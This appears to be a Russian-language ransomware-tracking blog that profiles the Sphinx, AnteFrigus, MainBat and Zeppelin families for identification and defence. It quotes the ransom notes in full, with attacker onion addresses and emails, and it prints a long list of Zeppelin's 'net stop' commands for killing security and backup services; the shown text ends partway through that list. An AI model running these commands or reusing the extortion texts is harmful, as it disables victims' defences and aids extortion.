Sphinx

Sphinx Ransomware

(шифровальщик-вымогатель) (первоисточник)
Translation into English

Этот крипто-вымогатель шифрует данные пользователей с помощью AES+RSA, а затем требует уплатить выкуп в течение 96 часов, чтобы вернуть файлы. Оригинальное название: Sphinx. На файле написано: нет данных.

Обнаружения:
DrWeb ->
BitDefender ->

© Генеалогия: выясняется, явное родство с кем-то не доказано.

Изображение — логотип статьи

К зашифрованным файлам добавляется расширение: .sphinx


Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. 


Активность этого крипто-вымогателя пришлась на первую половину ноября 2019 г. Ориентирован на англоязычных пользователей, что не мешает распространять его по всему миру.

Записка с требованием выкупа называется: HOW TO DECRYPT FILES.txt

Содержание записки о выкупе:
//  You are become victim of Sphinx ransomware!
[*] What Happened?
  Your network is compromised and all your machines has been encrypted!
  We have exploited your network vulnerabilities and encrypted all of your machines data with,
  powerful hybrid cryptosystem, RSA-4096 and AES-256.
  There is no way to break the encryption except with your network private key and special decryption software!
  The only way to recover your data is buy them through our page on Hidden Network.
[*] How to Access Hidden Network?
  1. Download Tor Browser - https://www.torproject.org/download/
  2. Start it and wait for the load.
  3. Visit link below with Tor Browser:
     http://decrypt5bub45vpr.onion/7f6243f6ce9604fb762933bb4e72548e
  4. Follow the instructions on our page.
[*] WARNING!
  YOUR TIME TO PAY IS LIMITED TO 96 HOUR. 
  DON'T WASTE YOUR TIME TO SEARCH ON INTERNET, BEFORE OUR SERVICE REMOVE YOUR NETWORK PRIVATE KEY.
  ***
  IF YOU DO NOT THINK ABOUT TO PAYMENT!
  WE SELL YOU'R COMPANY'S PRIVATE DATA ON DARK MARKETS!
  YOU CAN ASK US FOR PROOF ANY TIME!
  ***

Перевод записки на русский язык:
// Вы стали жертвой Sphinx Ransomware!
[*] Что случилось?
  Ваша сеть взломана, а все ваши машины зашифрованы!
  Мы использовали ваши сетевые уязвимости и зашифровали данные всех ваших машин с помощью:
  мощная гибридная криптосистема RSA-4096 и AES-256.
  Нет никакого способа сломать шифрование, кроме как с помощью сетевого ключа и специальной программы для расшифровки!
  Единственный способ восстановить ваши данные - купить их через нашу страницу в Скрытой Сети.
[*] Как получить доступ к скрытой сети?
  1. Загрузите Tor Browser - https://www.torproject.org/download/
  2. Запустите его и дождитесь загрузки.
  3. Посетите ссылку ниже с Tor Browser:
     http://decrypt5bub45vpr.onion/7f6243f6ce9604fb762933bb4e72548e
  4. Следуйте инструкциям на нашей странице.
[*] ВНИМАНИЕ!
   ВАШЕ ВРЕМЯ ДЛЯ ОПЛАТЫ ОГРАНИЧЕНО 96 ЧАСАМИ.
   НЕ ТРАТЬТЕ ВРЕМЯ НА ПОИСК В ИНТЕРНЕТЕ, ПРЕЖДЕ НАШ СЕРВИС УДАЛИТ ВАШ СЕТЕВОЙ КЛЮЧ.
  ***
   ЕСЛИ ВЫ НЕ ДУМАЕТЕ ОБ ОПЛАТЕ!
   МЫ ПРОДАЕМ ВАШИ ЛИЧНЫЕ ДАННЫЕ КОМПАНИИ НА ТЕМНЫХ РЫНКАХ!
   ВЫ МОЖЕТЕ ОБРАТИТЬСЯ К НАМ ЗА ДОКАЗАТЕЛЬСТВОМ В ЛЮБОЕ ВРЕМЯ!
  ***

Технические детали

Может распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, вредоносной рекламы, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.

Нужно всегда использовать Актуальную антивирусную защиту!!!
Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1. 


Список файловых расширений, подвергающихся шифрованию:
Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, архивы и пр.

Файлы, связанные с этим Ransomware:
HOW TO DECRYPT FILES.txt
<random>.exe - случайное название вредоносного файла

Расположения:
\Desktop\ ->
\User_folders\ ->
\%TEMP%\ ->

Записи реестра, связанные с этим Ransomware:
См. ниже результаты анализов.

Сетевые подключения и связи:
Tor-URL: xxxx://decrypt5bub45vpr.onion/7f6243f6ce9604fb762933bb4e72548e

Email:
BTC:
См. ниже в обновлениях другие адреса и контакты.
См. ниже результаты анализов.

Результаты анализов:
Ⓗ Hybrid analysis >>
𝚺  VirusTotal analysis >>
🐞 Intezer analysis >>
ᕒ  ANY.RUN analysis >>
ⴵ  VMRay analysis >>
Ⓥ VirusBay samples >>
⨇ MalShare samples >>
👽 AlienVault analysis >>
🔃 CAPE Sandbox analysis >>
⟲ JOE Sandbox analysis >>


Степень распространённости: низкая.
Подробные сведения собираются регулярно. Присылайте образцы.

---

=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===

---

=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===

Ещё не было обновлений этого варианта.

---

=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===

 Read to links: 
 Tweet on Twitter + Tweet + myTweet
 ID Ransomware (ID as ***)
 Write-up, Topic of Support
 * 

 Thanks: 
 ***
 Andrew Ivanov (author)
 ***
 to the victims who sent the samples
 

© Amigo-A (Andrew Ivanov): All blog articles.

AnteFrigus

AnteFrigus Ransomware

(шифровальщик-вымогатель) (первоисточник на русском)
Translation into English

Этот крипто-вымогатель шифрует данные пользователей с помощью AES, а затем требует выкуп в $1.995, который увеличивается через 4 дня до $3.990. Оригинальное название: AnteFrigus. На файле написано: нет данных. 

Обнаружения:
DrWeb -> Trojan.PWS.Siggen2.38675, Trojan.Encoder.30119
BitDefender -> Trojan.GenericKD.32711050
ALYac -> Trojan.Ransom.AnteFrigus
Avira (no cloud) -> TR/Crypt.Agent.yyhfq
ESET-NOD32 -> A Variant Of Win32/Kryptik.GYHS
Kaspersky -> Trojan.Win32.Zenpak.rbj
Malwarebytes -> Trojan.MalPack.GS

© Генеалогия: AnteFrigus > Prometey

Изображение — логотип статьи

К зашифрованным файлам добавляется расширение: .<random>


Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. 


Активность этого крипто-вымогателя пришлась на начало ноября 2019 г. Ориентирован на англоязычных пользователей, что не мешает распространять его по всему миру. 

Записка с требованием выкупа называется: <random>-readme.txt
Например:
hssjyh-readme.txt
jbptlio-readme.txt

Содержание записки о выкупе:

 $$$$    $$  $$   $$$$$$   $$$$$    $$$$$$   $$$$$    $$$$$$    $$$$    $$  $$    $$$$
$$  $$   $$$ $$     $$     $$       $$       $$  $$     $$     $$       $$  $$   $$
$$$$$$   $$ $$$     $$     $$$$     $$$$     $$$$$      $$     $$ $$$   $$  $$    $$$$
$$  $$   $$  $$     $$     $$       $$       $$  $$     $$     $$  $$   $$  $$       $$
$$  $$   $$  $$     $$     $$$$$    $$       $$  $$   $$$$$$    $$$$     $$$$     $$$$

[+] Whats Happen ? [+]
Your files are encrypted, and currently unavailable.You can check it : all files on you computer has expansion hssjyh.
By the way, everything is possible to recover(restore), but you need to follow our instructions.Otherwise, you cant return your data(NEVER).
[+] What guarantees ? [+]
Its just a business.We absolutely do not care about youand your deals, except getting benefits.If we do not do our workand liabilities - nobody will not cooperate with us.Its not in our interests.
To check the ability of returning files, You should go to our website.There you can decrypt one file for free.That is our guarantee.
If you will not cooperate with our service - for us, its does not matter.But you will lose your timeand data, cause just we have the private key.In practise - time is much more valuable than money.
[+] How to get access on website ? [+]
You have two ways :
1)[Recommended] Using a TOR browser!
a) Download and install TOR browser from this site: https://torproject.org/ 
b) Open our website :  http://yboa7nidpv5jdtumgfm4fmmvju3ccxlleut2xvzgn5uqlbjd5n7p3kid.onion/?hssjyh
  (If you can’t follow the link or other difficulty write to the technical support email : antefrigus@cock.li) 
 2) If TOR blocked in your country, try to use VPN! For this:
 a) Open any browser (Chrome, Firefox, Opera, IE, Edge) and download and install free VPN programm and download TOR browser from this site https://torproject.org/ 
  b) If you are having difficulty purchase bitcoins, or you doubt in buying decryptor, contact to any data recovery company in your country, they will give you more guarantees and take purchase and decryption procedure on themselves. Almost all such companies heared about us and know that our decryption program work, so they can help you.
 When you open our website, put the following data in the input form:
Key:
Pjg/ODo4PD08PD87OTg5Nyhoa3RwdShvenpxgG8oSkEnOTw8Njk4OidOaUM2aXlFJw==
Extension name :  
hssjyh
---------------------------------------------------------------------------------------- -
!!!DANGER !!!
DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private keyand, as result, The Loss all data.
!!!!!!!!!
ONE MORE TIME : Its in your interests to get your files back.From our side, we(the best specialists) make everything for restoring, but please should not interfere.
!!!!!!!!!

Перевод записки на русский язык:
[+] Что случилось? [+]
Ваши файлы зашифрованы и сейчас недоступны. Вы можете проверить это: все файлы на вашем компьютере имеют расширение hssjyh.
Кстати, все можно восстановить (вернуть), но вы должны следовать нашим инструкциям. В противном случае вы не можете вернуть свои данные (НИКОГДА).
[+] Какие гарантии? [+]
Это просто бизнес. Мы абсолютно не заботимся о вас и ваших сделках, кроме получения выгоды. Если мы не выполняем свою работу и обязательства - никто не будет сотрудничать с нами. Это не в наших интересах.
Чтобы проверить возможность возврата файлов, вы должны зайти на наш сайт. Там вы можете бесплатно расшифровать один файл. Это наша гарантия.
Если вы не будете сотрудничать с нашим сервисом - для нас это не имеет значения. Но вы потеряете свое время и данные, ведь только у нас есть закрытый ключ. На практике время гораздо ценнее денег.
[+] Как получить доступ на сайт? [+]
У вас есть два пути:
1) [Рекомендуется] Использовать браузер TOR!
а) Загрузите и установите браузер TOR с этого сайта: https://torproject.org/
б) Откройте наш веб-сайт: http://yboa7nidpv5jdtumgfm4fmmvju3ccxlleut2xvzgn5uqlbjd5n7p3kid.onion/?hssjyh
  (Если вы не можете перейти по ссылке или по другим причинам, напишите на электронную почту технической поддержки: antefrigus@cock.li)
 2) Если TOR заблокирован в вашей стране, попробуйте использовать VPN! За это:
 а) Откройте любой браузер (Chrome, Firefox, Opera, IE, Edge), загрузите и установите бесплатную программу VPN и загрузите браузер TOR с этого сайта https://torproject.org/
  б) Если у вас возникли трудности с покупкой биткойнов или вы сомневаетесь в покупке расшифровщика, обратитесь в любую компанию по восстановлению данных в вашей стране, которая предоставит вам больше гарантий и возьмет на себя процедуру покупки и расшифровки. Почти все такие компании слышали о нас и знают, что наша программа расшифровки работает, поэтому они могут вам помочь.
 Когда вы открываете наш сайт, введите следующие данные в форму ввода:
Ключ:Pjg/ODo4PD08PD87OTg5Nyhoa3RwdShvenpxgG8oSkEnOTw8Njk4OidOaUM2aXlFJw==
Название расширения:
hssjyh---------------------------------------------------------------------------------------- -
!!!ОПАСНОСТЬ !!!
НЕ пытайтесь изменить файлы самостоятельно, НЕ используйте любую стороннюю программу для восстановления ваших данных или антивирусные решения - это может повлечь за собой повреждение личного ключа и, как результат, потерю всех данных.
!!!!!!!!!ЕЩЕ РАЗ: В ваших интересах вернуть ваши файлы. Со своей стороны мы (лучшие специалисты) делаем все для восстановления, но, пожалуйста, не мешайте.
!!!!!!!!!
---

Записка о выкупе также сохраняется в специальной папке на диске С:
C:\Instraction\

Скриншоты сайта вымогателей:

Технические детали

Распространяется с помощью вредоносной рекламной кампании HookAds, вредоносная реклама которой теперь перенаправляет пользователей на веб-страницы с набором эксплойтов RIG. На инфицированном ПК разворачивается вредоносный элемент, который устанавливает шифровальщик AnteFrigus. В 2018 году HookAds распространяла GlobeImposter. На момент написания этой статьи рекламная кампания HookAds уже продолжается несколько лет (с 2016 года), и каждый день регистрируются новые мошеннические рекламные домены.

Может распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов (RIG EK), вредоносной рекламы, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.

Нужно всегда использовать Актуальную антивирусную защиту!!!
Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1. 


➤ В отличие от других вымогателей, AnteFrigus не предназначен для диска "C", а только для других дисков, в описанном примере его целями были съемные устройства и подключенные сетевые диски (буквы дисков из кода  D:, E:, F:, G:, H:, I:).

➤ Для определения IP ПК используется сайт: 
xxxx://iplogger.org/10UJ73

Список файловых расширений, подвергающихся шифрованию:
Все файлы, кроме пропускаемых. 
Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, архивы и пр.

Пропускаемые типы файлов: 

.adv, .ani, .bat, .big, .bin, .cab, .cmd, .com, .cpl, .cur, .deskthemepack, .diagcab, .diagcfg, .diagpkg, .dll, .drv, .exe, .hlp, .hta, .icl, .icns, .ico, .ics, .idx, .key, .ldf, .lnk, .lock, .mod, .mpa, .msc, .msi, .msp, .msstyles, .msu, .nls, .nomedia, .ocx, .pck, .prf, .rom, .rtp, .scr, .shs, .spl, .sys, .theme, .themepack, .wpx (49 расширений). 

Файлы, связанные с этим Ransomware:
<random>-readme.txt - шаблон записки
hssjyh-readme.txt - пример записки
test.txt - файл для блокировки или отладки. 
rad26628.tmp.exe - пример названия вредоносного файла
<random>.tmp.exe - шаблон названия вредоносного файла

Расположения:
C:\Instraction\
\Desktop\ ->
\User_folders\ ->
\%TEMP%\ ->

Записи реестра, связанные с этим Ransomware:
См. ниже результаты анализов.

Сетевые подключения и связи:
Tor-URL: xxxx://yboa7nidpv5jdtumgfm4fmmvju3ccxlleut2xvzgn5uqlbjd5n7p3kid.onion/
Email: antefrigus@cock.li
BTC: - 
См. ниже в обновлениях другие адреса и контакты.
См. ниже результаты анализов.

Результаты анализов:
Ⓗ Hybrid analysis >>
𝚺  VirusTotal analysis >>  VT>  VT>
🐞 Intezer analysis >>
ᕒ  ANY.RUN analysis >>
ⴵ  VMRay analysis >>
Ⓥ VirusBay samples >>
⨇ MalShare samples >>
👽 AlienVault analysis >>
🔃 CAPE Sandbox analysis >>
⟲ JOE Sandbox analysis >>


Степень распространённости: низкая.
Подробные сведения собираются регулярно. Присылайте образцы.

---

=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===

---

=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===

Обновление от 10 февраля 2020:
Пост в Твиттере >>
Расширения: .eaaeee, .bbadc
Записки: CLICK_HERE-eaaeee.txt, CLICK_HERE-bbadc.txt
URL: xxxxs://recovery-help.top/online-chat/
Tor-URL: xxxx://i6jppiczqa5moqf157gssi33npwfseqppdsnz7rriiv7suf4pf4w42id.onion
Результаты анализов: VT + IA + VMR

 

Обновление от 30 марта 2020:
Пост в Твиттере >>
Расширения: .aceadf, .daaefc, .feeef
Записки: ATTENTION-aceadf-README.txt
ATTENTION-daaefc-README.txt
ATTENTION-feeef-README.txt
URL: xxxx://restore-now.top/online-chat/
Tor-URL: xxxx://i6jppiczqa5moqfl57gssi33npwfseqppdsnz7rriiv7suf4pf4w42id.onion
Файл EXE: directx_update.exe
Результаты анализов: VT + AR + IA + VMR + TG

 

➤ Содержание записки: 
Sorry, but your files are locked due to a critical error in your system. If you yourself want to decrypt the files - you will lose them FOREVER.
You have to pay BITCOINS to get your file decoder. DO NOT TAKE TIME, you have SEVERAL DAYS to pay, otherwise the cost of the decoder will double. How to do it is written below.
If you cannot do it yourself, then search the Internet for file recovery services in your country or city.
Go to the page through the browser: http://restore-now.top/online-chat/ 
If your site does not open, then download the TOR browser (https://torproject.org/). If you can’t access the download page of the TOR browser, then download the VPN!
After you install the TOR browser on your computer go to the site: http://i6jppiczqa5moqfl57gssi33npwfseqppdsnz7rriiv7suf4pf4w42id.onion
After going to the site, enter the information:
Your ID: 32476*****
Personal key: a2hobG1qKGhrdHB1KDo5Oz49OTk4PTcoSkEnOTw8Njk5OCdOaUM2a*****==
Your Email



Обновление от 19 января 2020:
Результаты анализов: VT + IA

---

=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===

 Read to links: 
 Tweet on Twitter + Tweet + myTweet
 ID Ransomware (ID as AnteFrigus)
 Write-up, Topic of Support
 * 

 Thanks: 
 GrujaRS, mol69, Michael Gillespie, Lawrence Abrams
 Andrew Ivanov (author), Emmanuel_ADC-Soft, S!Ri
 ***
 to the victims who sent the samples
 

© Amigo-A (Andrew Ivanov): All blog articles.

MainBat, TestRansom

MainBat Ransomware

TestRansom Ransomware

(шифровальщик-вымогатель) (первоисточник)
Translation into English

Этот крипто-вымогатель шифрует или делает вид, что шифрует данные пользователей, а затем сообщает, что файлы пока не зашифрованы. Оригинальное название: в записке не указано. На файла написано: main.bat, TestRansom.exe.

Обнаружения:
DrWeb -> DrWeb -> BAT.Encoder.85
BitDefender -> 
ESET-NOD32 -> BAT/Filecoder.DE
Symantec -> Downloader
Kaspersky -> Trojan-Ransom.Win32.Encoder.gch
McAfee -> RDN/Ransom
TrendMicro -> Trojan.Win32.WACATAC.USXVPKB19

© Генеалогия: другие BAT-вымогатели >> MainBat

Изображение — логотип статьи

К зашифрованным файлам добавляется расширение: .crypt
На данный момент сообщается о тестовом варианте, который не должен шифровать файлы, но ситуация может измениться, когда он попадет в другие руки.  

Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. 


Образец этого крипто-вымогателя был найден в начале ноября 2019 г. Дата компиляции исполняемого файла: 27 апреля 2019. Ориентирован на англоязычных пользователей, что не мешает распространять его по всему миру. 

Записка с требованием выкупа называется: message.txt

Содержание записки о выкупе:
Ops! Your files are encrypted.
Your files,documents,photos,etc have been encrypted and
are not currently accessable without the key! The key is
currently stored in memory and on reboot will be deleated!
This is a test malware and will not actually destroy your
files in this simulation. Your keys will be shown below;
 CryptKey: 29109-9***
 UserKey: admin-105759***

Перевод записки на русский язык:
Упс! Ваши файлы зашифрованы.
Ваши файлы, документы, фотографии и т.д. зашифрованы и
в настоящее время недоступны без ключа! Ключ
в данный момент хранится в памяти и при перезагрузке будет удален!
Это тестовый вредонос, который на самом деле не уничтожит ваши
файлы в этой симуляции. Ваши ключи будут показаны ниже;
 CryptKey: 29109-9***
 UserKey: admin-105759***

Технические детали

Может распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, вредоносной рекламы, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.

Нужно всегда использовать Актуальную антивирусную защиту!!!
Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1. 



➤ Использует BAT-файл для начала атаки:
C:\Windows\system32\cmd.exe /K "C:\Users\admin\crypt.bat"

➤ Другие деструктивные функции: 
Прописывает файлы message.bat / message.txt в меню Пуск
Запускает CMD.EXE для выполнения команд
Запускает CMD.EXE для самостоятельного удаления
Запускается самостоятельно
Создает файлы в пользовательских каталогах

➤ Используют легитимную технологию самоизвлекающихся архивов (WinRar, WinZip, 7-Zip).

Список файловых расширений, подвергающихся шифрованию:
Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, архивы и пр.

Файлы, связанные с этим Ransomware:
main.bat
message.txt
message.bat
crypt.zip
crypt.zip.tmp
crypt.zip.tmp8
crypt.zip.tmp7
crypt.zip.tmp6
crypt.zip.tmp5
crypt.zip.tmp4
crypt.zip.tmp3
crypt.zip.tmp2
crypt.zip.tmp1
FileList.txt
7za.exe
<random>.exe - случайное название вредоносного файла
sfxrar.pdb - первоначальное название файла проекта

Расположения:
\Desktop\ ->
\User_folders\ ->
\%TEMP%\ ->
C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\message.txt

C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\message.bat
D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb

Записи реестра, связанные с этим Ransomware:
См. ниже результаты анализов.

Сетевые подключения и связи:
Email: - 
BTC: - 
См. ниже в обновлениях другие адреса и контакты.
См. ниже результаты анализов.

Результаты анализов:
Ⓗ Hybrid analysis >>  HA>>
𝚺  VirusTotal analysis >>  VT>> VT>>
🐞 Intezer analysis >>
ᕒ  ANY.RUN analysis >>  AR>>
ⴵ  VMRay analysis >>
Ⓥ VirusBay samples >>
⨇ MalShare samples >>
👽 AlienVault analysis >>
🔃 CAPE Sandbox analysis >>
⟲ JOE Sandbox analysis >>


Степень распространённости: низкая.
Подробные сведения собираются регулярно. Присылайте образцы.

---

=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===

---

=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===

Ещё не было обновлений этого варианта.

---

=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===

 Read to links: 
 Tweet on Twitter + Tweet + myTweet
 ID Ransomware (ID as ***)
 Write-up, Topic of Support
 * 

 Thanks: 
 dnwls0719, GrujaRS
 Andrew Ivanov (author)
 ***
 to the victims who sent the samples
 

© Amigo-A (Andrew Ivanov): All blog articles.

Zeppelin

Zeppelin Ransomware

Buran-Zeppelin Ransomware

(шифровальщик-вымогатель, RaaS) (первоисточник)
Translation into English

Этот крипто-вымогатель шифрует данные пользователей с помощью AES-256 (режим CBC) + RSA-2048 для защиты закрытого ключа, а затем требует выкуп в # BTC, чтобы вернуть файлы. Оригинальное название: Zeppelin. Написан на Delphi. 
---
Обнаружения:
DrWeb -> DLOADER.Trojan, Trojan.Encoder.25574, Trojan.Encoder.30393
BitDefender -> Trojan.GenericKD.42071109, Generic.Ransom.Buhtrap.***
Malwarebytes -> Ransom.Buran
McAfee -> RDN/Generic.grp, GenericRXJE-WA!FEE6BA9A0D7A
Microsoft -> Trojan:Win32/Wacatac.B!ml, Ransom:Win32/Zeppelin.A!MSR
ESET-NOD32 -> A Variant Of Win32/Filecoder.Buran.H
Symantec -> Trojan Horse, ML.Attribute.HighConfidence
---

© Генеалогия: Buran > Zeppelin (Buran V)

Изображение — логотип статьи

 

Эти символы ³ZEPPELIN³ добавляются в код зашифрованных файлов (в начало) как файловый маркер. Стилизованное изображение под дирижабль Zeppelin.

К зашифрованным файлам добавляется расширение в формате 3х3, например, как в тексте записки: .126-A9A-0E9 или .244-A80-137

Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. 


Активность этого крипто-вымогателя пришлась на вторую половину ноября 2019 г. (штамп времени: 6 ноября 2019) и продолжилась в декабре 2019 и позже, в 2020-2021 г. Ориентирован на англоязычных и иноязычных пользователей, может распространяться по всему миру.

Записка с требованием выкупа называется: readme.txt
Другой вариант: !!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

 

Так это выглядит при открытии файла в Блокноте. 

 

Так это выглядит при открытии файла в браузере Google Chrome. 


Содержание записки о выкупе:
                                       ---=== Welcome. Again. ===---
                                        [+] Whats Happen? [+]
Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension 126-A9A-0E9
By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).
                                        [+] What guarantees? [+]
Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.To be sure we have the decryptor and it works you can send an email: zeppelindecrypt@420blaze.it and decrypt one file for free.
But this file should be of not valuable!
If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money.
Write to email: zeppelindecrypt@420blaze.it
Reserved email: zeppelin_helper@tuta.io
Reserved jabber: zeppelin_decrypt@xmpp.jp
Your personal ID: 126-A9A-0E9
                                       !!! DANGER !!!
DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data.
!!! !!! !!!
ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
!!! !!! !!!

Перевод записки на русский язык:
                                        ---=== Добро пожаловать. Снова. ===---
                                        [+] Что случилось? [+]
Ваши файлы зашифрованы и теперь недоступны. Вы можете проверить это: все файлы на вашем компьютере имеют расширение 126-A9A-0E9
Кстати, все можно вернуть (восстановить), но нужно следовать нашим инструкциям. В противном случае вы не сможете вернуть свои данные (НИКОГДА).
                                        [+] Какие гарантии? [+]
Это просто бизнес. Мы абсолютно не заботимся о вас и ваших сделках, кроме получения льгот. Если мы не будем выполнять свою работу и обязательства - никто не будет с нами сотрудничать. Это не в наших интересах. Чтобы убедиться, что у нас есть расшифровщик, и он работает, вы можете написать на email zeppelindecrypt@420blaze.it и дешифровать один файл бесплатно.
Но этот файл не должен быть ценным!
Если вы не будете сотрудничать с нашим сервисом - для нас это не имеет значения. Но вы потеряете свое время и данные, потому что только у нас есть закрытый ключ. На практике время гораздо ценнее денег.
Написать на email: zeppelindecrypt@420blaze.it
Резервный адрес email: zeppelin_helper@tuta.io
Резервный jabber: zeppelin_decrypt@xmpp.jp
Ваш личный ID: 126-A9A-0E9
                                       !!! ОПАСНОСТЬ !!!
НЕ пытайтесь изменить файлы самостоятельно, НЕ используйте любую  стороннюю программу для восстановления ваших данных или антивирусные решения - это может повлечь за собой повреждение личного ключа и, как следствие, потерю всех данных.
!!! !!! !!!
ЕЩЕ РАЗ: В ваших интересах вернуть ваши файлы. Со своей стороны мы (лучшие специалисты) делаем все для восстановления, но, пожалуйста, не нужно мешать.
!!! !!! !!!

Технические детали

Может распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, вредоносной рекламы, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.

Нужно всегда использовать Актуальную антивирусную защиту!!!
Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1. 

➤ При первом запуске Zeppelin Ransomware проверяет код страны жертвы, чтобы убедиться, что компьютер не находится в одной из следующих стран:

Россия

Украина

Белоруссия

Казахстан

С этой целью он проверяет язык ОС компьютера, установленный по умолчанию, телефонный код страны по умолчанию, или использует онлайн-сервисы для получения внешнего IP-адреса жертвы. 

Использует следующие сайты для определения IP и страны компьютера: 
iplogger.org
geoiptool.com

➤ Zeppelin Ransomware создает в каталоге %TEMP% пустой файл с расширением “.zeppelin” и именем, которое представляет собой хэш CRC32 пути вредоносной программы.

Если установлен параметр “Startup”, вредонос копирует себя в каталог %APPDATA%\Roaming\Microsoft\Windows, используя случайно выбранное из списка активных процессов имя (игнорируя любые процессы, которые были вызваны с помощью аргументов командной строки “install” и “setup”).

Выбранное имя затем шифруется с помощью случайно сгенерированного 32-байтового ключа RC4, кодированного в base64 (вместе с добавленным ключом) и сохраняется в значение реестра с названием “Process” под HKCU\Software\Zeppelin.

После закрепления в системе с помощью ключа реестра  HKCU\Software\Microsoft\Windows\CurrentVersion\Run программа-вымогатель повторно запустит себя с нового пути с аргументом “-start”. Если установлен параметр “UAC prompt”, он попытается запуститься с повышенными привилегиями.

Если установлен параметр “Melt”, поток самоудаления будет внедрен во вновь созданный процесс notepad.exe, и вредонос завершится с кодом 0xDEADFACE. Иначе он завершится с кодом 0. 

➤ Zeppelin Ransomware использует следующий набор комнад для остановки процессов программ безопасности, резервного копирования, баз данных, для удаления теневых копий файлов, отключения функций восстановления и исправления Windows на этапе загрузки, для очистки системных журналов: 

net stop "Acronis VSS Provider" /y

net stop "Enterprise Client Service" /y

net stop "SQL Backups" /y

net stop "SQLsafe Backup Service" /y

net stop "SQLsafe Filter Service" /y

net stop "Sophos Agent" /y

net stop "Sophos AutoUpdate Service" /y

net stop "Sophos Clean Service" /y

net stop "Sophos Device Control Service" /y

net stop "Sophos File Scanner Service" /y

net stop "Sophos Health Service" /y

net stop "Sophos MCS Agent" /y

net stop "Sophos MCS Client" /y

net stop "Sophos Message Router" /y

net stop "Sophos Safestore Service" /y

net stop "Sophos System Protection Service" /y

net stop "Sophos Web Control Service" /y

net stop "Symantec System Recovery" /y

net stop "Veeam Backup Catalog Data Service" /y

net stop "Zoolz 2 Service" /y

net stop ARSM /y

net stop AVP /y

net stop AcrSch2Svc /y

net stop AcronisAgent /y

net stop Antivirus /y

net stop BackupExecAgentAccelerator /y

net stop BackupExecAgentBrowser /y

net stop BackupExecDeviceMediaService /y

net stop BackupExecJobEngine /y

net stop BackupExecManagementService /y

net stop BackupExecRPCService /y

net stop BackupExecVSSProvider /y

net stop DCAgent /y

net stop EPSecurityService /y

net stop EPUpdateService /y

net stop ESHASRV /y

net stop EhttpSrv /y

net stop EraserSvc11710 /y

net stop EsgShKernel /y

net stop FA_Scheduler /y

net stop IISAdmin /y

net stop IMAP4Svc /y

net stop KAVFS /y

net stop KAVFSGT /y

net stop MBAMService /y

net stop MBEndpointAgent /y

net stop MMS /y

net stop MSExchangeES /y

net stop MSExchangeIS /y

net stop MSExchangeMGMT /y

net stop MSExchangeMTA /y

net stop MSExchangeSA /y

net stop MSExchangeSRS /y

net stop MSOLAP$SQL_2008 /y

net stop MSOLAP$SYSTEM_BGC /y

net stop MSOLAP$TPS /y

net stop MSOLAP$TPSAMA /y

net stop MSSQL$BKUPEXEC /y

net stop MSSQL$ECWDB2 /y

net stop MSSQL$PRACTICEMGT /y

net stop MSSQL$PRACTTICEBGC /y

net stop MSSQL$PROD /y

net stop MSSQL$PROFXENGAGEMENT /y

net stop MSSQL$SBSMONITORING /y

